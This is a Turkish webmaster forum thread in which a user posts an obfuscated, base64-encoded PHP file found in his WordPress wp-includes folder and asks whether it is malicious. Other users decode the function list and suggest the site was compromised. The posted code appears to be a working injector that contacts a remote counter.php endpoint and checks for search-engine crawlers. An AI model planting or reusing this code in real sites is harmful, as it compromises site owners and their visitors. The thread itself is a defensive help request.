0
Kayıt Ol

Yardım : Base64 ile encrypter edilmiş php dosya

3

401

  • 14-11-2014, 14:59:28
    #1
    EgeBey
    EgeBey
    Sitemin ftpsinde buldugum bir dosyanın içerigi bu arkadaşlar nedir bu ? virus falan mı ? internette araştırdım decode edebilecegim bir araç bulamadım

    <?php $GLOBALS['_1485877630_']=Array(base64_decode('' .'ZXJyb' .'3JfcmVw' .'b3J0aW5n'),base64_decode('aW5p' .'X3NldA=='),base64_decode('' .'c3' .'Ry' .'cG' .'9z'),base64_decode('ZXhwbG9kZQ=='),base64_decode('dH' .'Jpb' .'Q=='),base64_decode('Y' .'X' .'JyY' .'Xlfc2h' .'pZ' .'nQ='),base64_decode('c3Vic3Ry'),base64_decode('c3' .'Rya' .'XBfdGF' .'ncw=='),base64_decode('cHJlZ19t' .'YXRj' .'a' .'F9hbGw='),base64_decode('cHJlZ1' .'9' .'t' .'YXRjaF9hbGw' .'='),base64_decode('cHJ' .'lZ19tY' .'XRja' .'F9h' .'b' .'Gw='),base64_decode('cHJlZ19t' .'YXRja' .'F9h' .'b' .'Gw='),base64_decode('c' .'HJlZ19tYX' .'RjaF9' .'hbGw='),base64_decode('cHJl' .'Z1' .'9' .'tYXRj' .'aF9hbGw' .'='),base64_decode('' .'cHJ' .'l' .'Z' .'19tYXR' .'ja' .'F9h' .'bGw='),base64_decode('cHJlZ19tYXRjaF9hb' .'Gw='),base64_decode('c' .'HJ' .'lZ1' .'9tYXRjaF9h' .'bGw='),base64_decode('cHJ' .'lZ' .'19tYXRjaF9hbG' .'w='),base64_decode('cHJlZ1' .'9tYXRjaF9hbG' .'w='),base64_decode('' .'cH' .'JlZ1' .'9t' .'Y' .'XRjaF9hbGw='),base64_decode('c' .'HJlZ' .'19tYXR' .'j' .'a' .'F9hbGw='),base64_decode('' .'c' .'HJlZ19tYXRja' .'F9' .'hbGw='),base64_decode('cHJlZ19tYXR' .'jaF9' .'hbGw='),base64_decode('' .'cHJlZ19tYXRjaF9hbGw='),base64_decode('cH' .'J' .'lZ1' .'9tYXRjaF9' .'hbGw='),base64_decode('YXJy' .'YXl' .'fa2' .'V5c' .'w' .'=='),base64_decode('c3' .'RycG9' .'z'),base64_decode('c3RybG' .'Vu'),base64_decode('c3RycnBv' .'cw=' .'='),base64_decode('' .'c3' .'Vic3R' .'y'),base64_decode('' .'c3Ryc' .'nB' .'vcw=='),base64_decode('c3V' .'ic3' .'Ry'),base64_decode('Y2' .'91bnQ' .'='),base64_decode('d' .'HJpbQ=='),base64_decode('YX' .'JyYXlf' .'c2h' .'p' .'Z' .'nQ='),base64_decode('c3RybGVu'),base64_decode('' .'c3V' .'ic' .'3R' .'y'),base64_decode('c3RybGVu'),base64_decode('' .'c' .'3' .'Vic3Ry'),base64_decode('c3RybGVu'),base64_decode('Y29' .'1bnQ='),base64_decode('' .'c' .'3Vi' .'c' .'3Ry'),base64_decode('Z' .'nVu' .'Y3Rpb25fZX' .'hpc3Rz'),base64_decode('' .'c3RyX3JlcGxhY2U='),base64_decode('Z' .'m' .'ls' .'Z' .'Q=='),base64_decode('' .'Zmxvb3I='),base64_decode('YmF' .'zZ' .'V9j' .'b' .'252ZXJ0'),base64_decode('c' .'3Vic3R' .'y'),base64_decode('' .'bWQ1'),base64_decode('' .'dHJpbQ=='),base64_decode('' .'ZX' .'hwbG9kZQ=' .'='),base64_decode('Y291b' .'nQ='),base64_decode('c3Ry' .'b' .'GV' .'u'),base64_decode('' .'ZnVuY' .'3Rpb25fZXh' .'pc3Rz'),base64_decode('c3RyX3JlcGxhY2U='),base64_decode('Zm' .'xvb3I='),base64_decode('YmFzZV9jb252' .'Z' .'XJ0'),base64_decode('c3Vic3Ry'),base64_decode('bW' .'Q' .'1'),base64_decode('Z' .'m9w' .'ZW4' .'='),base64_decode('Zn' .'JlYWQ='),base64_decode('ZmlsZ' .'XNpemU' .'='),base64_decode('Z' .'mNsb3Nl'),base64_decode('Z' .'XhwbG9kZQ' .'=='),base64_decode('Y29' .'1bnQ='),base64_decode('' .'c3Ry' .'b' .'GVu'),base64_decode('' .'ZnVu' .'Y3Rpb' .'2' .'5fZXhpc3Rz'),base64_decode('c3Ry' .'X3J' .'lc' .'G' .'xhY2U' .'='),base64_decode('' .'ZnNvY2t' .'vcGV' .'u'),base64_decode('Z' .'m' .'xvb3I' .'='),base64_decode('YmFzZV9jb252ZXJ' .'0'),base64_decode('c3' .'Vic' .'3Ry'),base64_decode('bWQ' .'1'),base64_decode('Znd' .'ya' .'XRl'),base64_decode('Zm' .'VvZ' .'g=='),base64_decode('ZnJlYWQ='),base64_decode('' .'Z' .'mNsb3Nl'),base64_decode('c3Ry' .'cG9z'),base64_decode('' .'c3Vic' .'3Ry'),base64_decode('ZXh' .'wbG9k' .'ZQ' .'=' .'='),base64_decode('Y29' .'1bnQ='),base64_decode('' .'c3' .'RybG' .'V' .'u'),base64_decode('ZnVuY3' .'Rpb25' .'fZX' .'h' .'pc3' .'Rz'),base64_decode('c' .'3RyX3Jl' .'c' .'GxhY2U='),base64_decode('c' .'29ja2V' .'0' .'X' .'2NyZ' .'WF' .'0ZQ' .'=' .'='),base64_decode('c29ja2V0X2' .'Nvb' .'m5lY3Q='),base64_decode('Zmxvb3I='),base64_decode('Ym' .'FzZV9j' .'b252' .'ZXJ0'),base64_decode('c3Vic3R' .'y'),base64_decode('' .'bWQ1'),base64_decode('c29' .'j' .'a2' .'V0X3d' .'yaX' .'Rl'),base64_decode('c3RybGVu'),base64_decode('' .'c29j' .'a2V' .'0X3J' .'lYWQ='),base64_decode('c29' .'ja' .'2V0' .'X' .'2Nsb3Nl'),base64_decode('c' .'3RycG9z'),base64_decode('c' .'3Vic3R' .'y'),base64_decode('ZXhw' .'b' .'G' .'9kZQ' .'=='),base64_decode('Y2' .'9' .'1bnQ='),base64_decode('c' .'3Ry' .'bG' .'Vu'),base64_decode('' .'ZXhwbG' .'9kZ' .'Q=='),base64_decode('' .'aW' .'5fYXJ' .'y' .'Y' .'X' .'k' .'='),base64_decode('c3RycG' .'9z'),base64_decode('' .'c3R' .'ydG9s' .'b3' .'dlcg=='),base64_decode('' .'c3RydG9s' .'b3dl' .'cg' .'==')); ?><?php function _143113029($i){$a=Array('YWxsb3dfdXJsX2ZvcGVuY291bnRlcmV5ZS53cw==MTA=bGlua3M=cGFnZWltcGFnZWltOQ==UEhQX1NFTEY=am9vbWxhX3Jzcy5waHA=PCEtLSBjb3VudGVkIGluIA==PCEtLSBXcm9uZyBwYXJhbWV0ZXIhIC0tPg==PCEtLSBNaXNzZWQgcGFyYW1ldGVyISAtLT4=Cg==PGJvZHk=L1thLXpdezIsfSsgYW5kIC8=L1thLXpdezIsfSsgdGhlIC8=L1thLXpdezIsfSsgb2YgLw==L1thLXpdezIsfSsgdG8gLw==L1thLXpdezIsfSsgb24gLw==L1thLXpdezIsfSsgaXMgLw==L1thLXpdezIsfSsgZGUgLw==L1thLXpdezIsfSsgZW4gLw==L1thLXpdezIsfSsgdW5kIC8=L1thLXpdezIsfSsgYXVmIC8=L1thLXpdezIsfSsgeSAvL1thLXpdezIsfSsgZSAvL1thLXpdezIsfSsgZXQgLw==L1thLXpdezIsfSsgbGEgLw==L1thLXpdezIsfSsgZGVzIC8=L1thLXpdezIsfSsgZGVyIC8=L1thLXpdezIsfSsgZGllIC8=MA==Pg==PA==IA==ZmlsZQ==d3d3Lg==SFRUUF9IT1NUaHR0cDovLw==L2MvY291bnRlci5waHA=P21kNT0=UkVRVUVTVF9VUkk=JnY9Cg==fHx8Zm9wZW4=d3d3Lg==SFRUUF9IT1NUaHR0cDovLw==L2MvY291bnRlci5waHA=P21kNT0=UkVRVUVTVF9VUkk=JnY9cg==fHx8ZnNvY2tvcGVud3d3Lg==SFRUUF9IT1NUR0VUIC9jL2NvdW50ZXIucGhwP21kNT0=UkVRVUVTVF9VUkk=JnY9IEhUVFAvMS4xDQo=SG9zdDogDQo=Q29ubmVjdGlvbjogQ2xvc2UNCg0KDQoNCg==fHx8c29ja2V0X2NyZWF0ZQ==d3d3Lg==SFRUUF9IT1NUR0VUIC9jL2NvdW50ZXIucGhwP21kNT0=UkVRVUVTVF9VUkk=JnY9IEhUVFAvMS4xDQo=SG9zdDogDQo=Q29ubmVjdGlvbjogQ2xvc2UNCg0KDQoNCg==fHx8MS4wLg==MS4xLg==MS4yLg==MTAzLjI0Ni4=MTA4LjE2Ny4=MTA4LjE3MC4=MTA4LjE3Ny4=MTA4LjU5Lg==MTA5LjEwOS4=MTEzLjE5Ny4=MTI0LjMwLg==MTQyLjI1MC4=MTQyLjI1MS4=MTU3LjIzOC4=MTY1LjE5My4=MTY2LjkwLg==MTcyLjIxNy4=MTcyLjI1My4=MTczLjE1Lg==MTczLjE2NC4=MTczLjE5NC4=MTczLjIwMC4=MTczLjIwMy4=MTczLjI0MC4=MTczLjI1NS4=MTc0LjE0Mi4=MTc4LjMzLg==MTc4LjYwLg==MTg0LjEwNy4=MTg0LjE3My4=MTg1LjI1Lg==MTkyLjExOS4=MTkyLjE1OC4=MTkyLjE3OC4=MTkyLjE3OS4=MTkyLjIwMC4=MTkzLjEyMC4=MTkzLjE0Mi4=MTkzLjE4Ni4=MTkzLjIwMC4=MTkzLjkyLg==MTk0LjEwMC4=MTk0LjExMC4=MTk0LjIyMS4=MTk0Ljc4Lg==MTk1LjEwMC4=MTk1LjE0MS4=MTk1LjE0NS4=MTk1LjE4Lg==MTk1LjIwNS4=MTk1LjIyLg==MTk1LjIyOS4=MTk1LjI3Lg==MTk1LjU5Lg==MTk1LjY1Lg==MTk1Ljc2Lg==MTk1LjgxLg==MTk2LjMuMTk4LjEwOC4=MTk5LjEwMi4=MTk5LjE5Mi4=MTk5LjIyMy4=MTk5LjIyNy4=MjAwLjIwMi4=MjAwLjk5Lg==MjAyLjEwNi4=MjAyLjk2Lg==MjAzLjIwOC4=MjAzLjIyMi4=MjAzLjk4Lg==MjA0LjE3Lg==MjA0LjUwLg==MjA1LjE5Ny4=MjA2LjE1Lg==MjA2LjE2MC4=MjA2LjE2OS4=MjA2LjE4Ni4=MjA2LjgwLg==MjA3LjIyMy4=MjA3LjI1MC4=MjA3LjQ3Lg==MjA3Ljg2Lg==MjA3Ljg4Lg==MjA4LjExMy4=MjA4LjE4NS4=MjA4LjIxLg==MjA4LjI1My4=MjA4LjM2Lg==MjA4LjM3Lg==MjA4LjQ0Lg==MjA4LjQ1Lg==MjA5LjExNi4=MjA5LjExOC4=MjA5LjExOS4=MjA5LjEyLg==MjA5LjE4NS4=MjA5LjIwMy4=MjA5LjIyMC4=MjA5LjIzNC4=MjA5LjI0NS4=MjA5LjI0Ny4=MjA5LjI0OS4=MjA5LjQ4Lg==MjA5Ljg1Lg==MjEyLjAuMjEyLjEwOC4=MjEyLjEyNi4=MjEyLjE3OS4=MjEyLjE4MS4=MjEyLjIxLg==MjEyLjQ5Lg==MjEyLjUwLg==MjEzLjE0NC4=MjEzLjE1MS4=MjEzLjE1Mi4=MjEzLjE4Ni4=MjEzLjE4Ny4=MjEzLjE5Lg==MjEzLjI0MC4=MjEzLjI0Ni4=MjEzLjMxLg==MjEzLjYxLg==MjE2LjEuMjE2LjEwOS4=MjE2LjExMC4=MjE2LjEzNi4=MjE2LjE1Ni4=MjE2LjIwNy4=MjE2LjIxLg==MjE2LjIxOC4=MjE2LjIzOS4=MjE2LjMzLg==MjE2LjM0Lg==MjE2LjU4Lg==MjE2LjU5Lg==MjE2LjY0Lg==MjE2Ljc0Lg==MjE3LjExOC4=MjE3LjE0OS4=MjE3LjE2My4=MjE3LjE5My4=MjE3LjI4Lg==MjE3LjMwLg==MjE3LjMzLg==MjIyLjY2Lg==MzguMTAxLg==MzguMTAyLg==MzguMTA0Lg==MzguMTA2Lg==MzguMTA3Lg==MzguOTguNC4zLg==NDYuNC4=NTAuMTE2Lg==NjIuMTU5Lg==NjIuMjAuNjIuMjMzLg==NjMuMTQ2Lg==NjMuMTYxLg==NjMuMTY2Lg==NjMuMjExLg==NjMuMjQzLg==NjMuMjUxLg==NjMuODMuNjMuODQuNjMuOTcuNjQuMC4=NjQuMTI0Lg==NjQuMTI4Lg==NjQuMTMyLg==NjQuMTU0Lg==NjQuMTg2Lg==NjQuMjMzLg==NjQuMjQ1Lg==NjQuNDEuNjQuNjguNjQuNzEuNjQuOS4=NjUuMTY3Lg==NjUuMTcwLg==NjUuMTcxLg==NjUuMTk2Lg==NjUuMjAxLg==NjUuMjA1Lg==NjUuMjEwLg==NjUuMjExLg==NjUuMjE0Lg==NjUuMjIxLg==NjUuMjIzLg==NjUuMjQ1Lg==NjUuNDcuNjYuMTAyLg==NjYuMTYyLg==NjYuMTkyLg==NjYuMjI3Lg==NjYuMjQ5Lg==NjYuNzcuNjcuMTIyLg==NjcuMTI2Lg==NjcuMTUyLg==NjcuNjkuNjcuOTMuNjkuMTExLg==NjkuMjI0Lg==NjkuMjI4Lg==NjkuMjM2Lg==NjkuMjM3Lg==NzAuMjM5Lg==NzAuMzIuNzAuODkuNzAuOTAuNzEuMTMwLg==NzIuMTQuNzIuMTYuNzQuMTI1Lg==NzUuMTcuNzUuMjMuNzUuMzcuNzUuNTIuNzYuMjAwLg==NzYuMjIwLg==NzYuMjMxLg==NzYuMjQyLg==NzYuMjQ2Lg==NzcuMTA5Lg==NzcuNDAuNzguOC4=OC4yMi4=OC4zNC4=OC4zNS4=OC42Lg==OC44Lg==ODAuMTQ2Lg==ODAuMTY5Lg==ODAuMjI3Lg==ODAuMjMxLg==ODAuMjM5Lg==ODAuNzcuODAuODAuODEuMjExLg==ODEuOTMuODIuOTQuODMuMTQxLg==ODMuMjIwLg==ODQuMjMzLg==ODQuMjM1Lg==ODYuMTI3Lg==ODcuMjQ0Lg==ODguMjA4Lg==ODkuMTE0Lg==ODkuMTc1Lg==ODkuMjA3Lg==ODkuOTYuOTIuNDUuOTMuMTUzLg==OTMuOTQuOTQuMjAwLg==OTQuNDAuOTUuMTcyLg==OTYuMTI1Lg==OTkuMTM2Lg==OTkuMTQ0Lg==OTkuMTQ4Lg==OTkuMTYzLg==OTkuNDAuOTkuNTUuOTkuOTYuSFRUUF9VU0VSX0FHRU5UR29vZ2xlYm90SFRUUF9VU0VSX0FHRU5UR29vZ2xlSFRUUF9VU0VSX0FHRU5UZ29vZ2xlSFRUUF9VU0VSX0FHRU5UQWhyZWZzQm90Lg==UkVNT1RFX0FERFI=Lg==Lg==');return base64_decode($a[$i]);} ?>
  • 14-11-2014, 15:44:47
    #2
    Eygun
    Eygun
    array'ın içindekiler

    Array
(
    [0] => error_reporting
    [1] => ini_set
    [2] => strpos
    [3] => explode
    [4] => trim
    [5] => array_shift
    [6] => substr
    [7] => strip_tags
    [8] => preg_match_all
    [9] => preg_match_all
    [10] => preg_match_all
    [11] => preg_match_all
    [12] => preg_match_all
    [13] => preg_match_all
    [14] => preg_match_all
    [15] => preg_match_all
    [16] => preg_match_all
    [17] => preg_match_all
    [18] => preg_match_all
    [19] => preg_match_all
    [20] => preg_match_all
    [21] => preg_match_all
    [22] => preg_match_all
    [23] => preg_match_all
    [24] => preg_match_all
    [25] => array_keys
    [26] => strpos
    [27] => strlen
    [28] => strrpos
    [29] => substr
    [30] => strrpos
    [31] => substr
    [32] => count
    [33] => trim
    [34] => array_shift
    [35] => strlen
    [36] => substr
    [37] => strlen
    [38] => substr
    [39] => strlen
    [40] => count
    [41] => substr
    [42] => function_exists
    [43] => str_replace
    [44] => file
    [45] => floor
    [46] => base_convert
    [47] => substr
    [48] => md5
    [49] => trim
    [50] => explode
    [51] => count
    [52] => strlen
    [53] => function_exists
    [54] => str_replace
    [55] => floor
    [56] => base_convert
    [57] => substr
    [58] => md5
    [59] => fopen
    [60] => fread
    [61] => filesize
    [62] => fclose
    [63] => explode
    [64] => count
    [65] => strlen
    [66] => function_exists
    [67] => str_replace
    [68] => fsockopen
    [69] => floor
    [70] => base_convert
    [71] => substr
    [72] => md5
    [73] => fwrite
    [74] => feof
    [75] => fread
    [76] => fclose
    [77] => strpos
    [78] => substr
    [79] => explode
    [80] => count
    [81] => strlen
    [82] => function_exists
    [83] => str_replace
    [84] => socket_create
    [85] => socket_connect
    [86] => floor
    [87] => base_convert
    [88] => substr
    [89] => md5
    [90] => socket_write
    [91] => strlen
    [92] => socket_read
    [93] => socket_close
    [94] => strpos
    [95] => substr
    [96] => explode
    [97] => count
    [98] => strlen
    [99] => explode
    [100] => in_array
    [101] => strpos
    [102] => strtolower
    [103] => strtolower
)
    php komutları görülüyor
  • 14-11-2014, 15:47:52
    #3
    EgeBey
    EgeBey
    Eygun adlı üyeden alıntı: mesajı görüntüle
    array'ın içindekiler

    php komutları görülüyor
    Zararlı mı bu dosya hocam ? wordpress kurulu sitemde wp-includes klasörü içerisindeki bir dosyada buldum bu kodları
  • 14-11-2014, 16:14:09
    #4
    Kaplan
    Kaplan
    EgeBey adlı üyeden alıntı: mesajı görüntüle
    Zararlı mı bu dosya hocam ? wordpress kurulu sitemde wp-includes klasörü içerisindeki bir dosyada buldum bu kodları
    Muhtemelen lisanssız yada güvenilir olmayan yapımcının sitesinden indirdiğiniz tema / eklenti yüzünden shell yemiş gibi duruyorsunuz.

    O dosya tek başına değildir muhtemelen sisteminizde.
    Kodlar zararlı mı ?
    - Yeterince işlem yapılır o listedeki fonksiyonlarla. Site çökertilir, başka dosyalar kopyalanır, klonlanır, silinir, düzeltilir....
    Ne için kullanıldığına bağlı. Standart php fonksiyonları..